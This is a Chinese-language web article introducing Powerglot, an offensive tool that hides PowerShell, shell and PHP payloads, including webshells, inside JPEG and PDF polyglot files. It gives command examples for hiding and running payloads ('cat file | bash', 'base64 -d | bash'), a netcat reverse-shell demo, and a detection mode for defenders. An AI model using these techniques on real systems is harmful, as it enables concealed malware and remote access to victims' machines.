您好,登錄后才能下訂單哦!
這篇文章給大家分享的是有關Powerglot是什么工具的內容。小編覺得挺實用的,因此分享給大家做個參考,一起跟隨小編過來看看吧。
Powerglot是一款功能強大的攻擊性PowerShell腳本編碼工具,該工具基于Polyglots實現其功能。本質上來說,Powerglot是一款攻擊性安全工具,適用于惡意軟件、權限提升、橫向滲透和反向Shell等方向。
Powerglot可以使用Polyglots來對各種類型的腳本進行編碼,比如說攻擊性PowerShell腳本,而且還不需要加載器即可運行Payload。
在紅隊演習或其他攻擊性任務中,Payload的偽裝/隱藏一般是通過隱寫術來完成的,尤其是在躲避網絡層保護機制的時候,這也是PowerShell Payload腳本開發中比較常見的技術。近期的一些惡意軟件和APT組織也都會選擇類似的方式來進行攻擊,比如說APT32、APT37、Ursnif、Powload、LightNeuron/Turla、Platinum APT、Waterbug/Turla、Lokibot、dukes(幽靈行動)和Tianium等等。
Powerglot是一款基于Polyglots開發的多功能跨平臺攻防工具,Powerglot允許開發人員將腳本代碼(PowerShell、Shell腳本和PHP等)隱寫在數字圖像中,目前該工具的開發人員也正在添加新的文件格式支持。跟其他攻擊性工具或惡意軟件不同的是,Powerglot不需要任何加載器就可以執行隱藏在目標文件中的信息了,這樣可以將惡意程序在目標系統上的噪聲降低到最小。
Powerglot在攻擊/滲透任務中有著明確的用途,但它也適用于藍隊研究人員。據我們所知,該工具是第一個通用且完全開源的攻擊性編碼工具,它可以幫助廣大研究人員使用Polyglots來搜索隱藏信息,而這些信息可以幫助開發人員在目標系統中實現惡意軟件的隱藏或持久性感染。
將PowerShell、Shell腳本和PHP等代碼編碼進圖像文件中,并且支持在不需要任何加載器的情況下來恢復/執行隱藏的信息(Payload)。PowerGlot適用于多種文件格式,但是目前僅支持JPEG和PDF,其他格式支持目前正在開發中。
PowerGlot是一款完整開源的工具,可以幫助研究人員檢測惡意代碼,特別是使用Truepolyglot 或stegoSploit等公共工具隱藏的信息結果。目前,開發人員正在給PowerGlot添加JPEG、PNG、GIF、BMP、ZIP、PDF、MP3等格式的支持。
# git clone https://github.com/mindcrypt/powerglot # python3 powerglot
下面給出的是如何使用Powerglot來隱藏Payload的一些演示樣例:
# python3 powerglot.py -o payload.ps1 cat.jpg cat-hidden1.jpg # python3 powerglot.py -o webshell.php cat.jpg cat-hidden2.jpg # python3 powerglot.py -o shell.sh cat.jpg cat-hidden3.jpg
# python3 powerglot.py -o linenum.sh cat.jpg cat-linenum.jpg # file cat-linenum.jpg (It is a valid JPEG file) # feh cat-lineum.jpg (The image is properly showed in an image viewer) # We can execute the script in several ways: a) cat cat-linenum | bash b) chmod +x cat-linenum.jpeg; ./cat-linenum.jpeg
# Attacker # echo "nc 127.0.0.1 4444" > netcat.sh # python3 powerglot.py -o netcat.sh cat.jpeg cat-netcat.jpeg # nc -nvlp 4444 #Victim # chmod +x cat-netcat.jpg | ./cat-netcat.jpg
# Create b64.sh with your favourite payload base64 Linenum.sh -w 0 > b64.sh # Edit b64.sh echo "code in b64.sh" | base64 -d | bash; # python3 powerglot -o b64.sh sample.pdf test.pdf # file test.pdf # xpdf test.pdf # Execute payload # cat test.pdf | bash or chmod +x test.pdf; ./test.pdf
# python3 powerglot.py -o script.ps1 cat.jpeg cat-ps.jpeg # file cat-ps.jpeg # feh cat-ps.jpeg # Execute payload (example) # cat cat-ps.jpeg | pwsh PS /home/alfonso/PowerGlot/POWERSHELL> get-process;<#hola <# mundo#> NPM(K) PM(M) WS(M) CPU(s) Id SI ProcessName ------ ----- ----- ------ -- -- ----------- 0 0,00 2,70 0,00 830 829 (sd-pam) 0 0,00 0,00 0,00 75 0 acpi_thermal_pm 0 0,00 4,80 0,00 1217 854 agent 0 0,00 1,70 0,00 748 748 agetty 0 0,00 40,77 1,01 1198 854 applet.py 0 0,00 6,29 0,00 938 938 at-spi-bus-launcher 0 0,00 6,61 5,64 953 938 at-spi2-registryd 0 0,00 0,00 0,00 131 0 ata_sff 0 0,00 1,77 0,00 8906 …78 atom 0 0,00 218,81 585,95 8908 …78 atom 0 0,00 236,18 176,24 8947 …78 atom 0 0,00 142,14 2,51 9009 …78 atom 0 0,00 81,54 3,32 8932 …78 atom --type=gpu-process --enable-features=SharedArrayBuffer -… 0 0,00 39,44 0,01 8910 …78 atom --type=zygote --no-sandbox 0 0,00 5,62 0,11 1370 …70 bash 0 0,00 5,36 0,66 5278 …78 bash 0 0,00 6,34 1,48 6778 …78 bash 0 0,00 0,00 0,00 68 0 blkcg_punt_bio 0 0,00 46,73 2,20 1199 854 blueman-applet 0 0,00 50,25 1,64 1301 854 blueman-tray
#python3 powerglot.py -d ./ --= [Detecting polyglots] --= .............................................................. [Suspicious file]-[ ./cat-end-extra2.jpg ].. [Suspicious file]-[ ./cat-end-extra3.jpg ][Polyglot Stegosploit][EOF Signature: */ -->] ................................................................................. [Suspicious file]-[ ./cat-end-extra1.jpg ]..
感謝各位的閱讀!關于“Powerglot是什么工具”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,讓大家可以學到更多知識,如果覺得文章不錯,可以把它分享出去讓更多的人看到吧!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。